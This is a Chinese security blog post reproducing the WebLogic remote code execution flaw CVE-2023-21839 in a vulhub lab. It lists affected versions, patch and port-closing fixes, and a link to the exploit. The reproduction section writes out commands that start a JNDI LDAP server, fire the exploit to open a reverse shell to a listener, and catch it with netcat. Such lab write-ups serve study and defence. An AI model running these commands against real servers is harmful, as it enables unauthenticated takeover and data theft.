【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞

admin 2023年2月27日16:15:32评论213 views字数 826阅读2分45秒阅读模式

0x01 前言

WebLogic存在远程代码执行漏洞(CVE-2023-21839),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露

0x02 影响版本

WebLogic_Server = 12.2.1.3.0WebLogic_Server = 12.2.1.4.0WebLogic_Server = 14.1.1.0.0

0x03 环境搭建

利用vulhub一键搭建环境,已安装了vulhub可以直接更新拉取镜像

 git pull docker-compose up -d

【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞

环境搭建成功访问:http://ip:7001/conosle

【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞

0x04 漏洞复现

起个ldap服务

 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip

【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞

反弹shell

CVE-2023-21839.exe -ip 1.1.1.1 -port 7001 -ldap ldap://ip:1389/Basic/ReverseShell/监听ip/6632

【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞

成功收到shell

nc -lvnp 6632

【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞

0x05 修复方案

 1、安装Oracle WebLogic Server最新安全补丁:https://www.oracle.com/security-alerts/cpujan2023.html 2、关闭T3和iiop协议端口,操作方法参考:https://help.aliyun.com/noticelist/articleid/1060577901.html

0x06 EXP获取方式

https://github.com/4ra1n/CVE-2023-21839

 

原文始发于微信公众号(EchoSec):【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月27日16:15:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞https://cn-sec.com/archives/1577406.html

发表评论

匿名网友 填写信息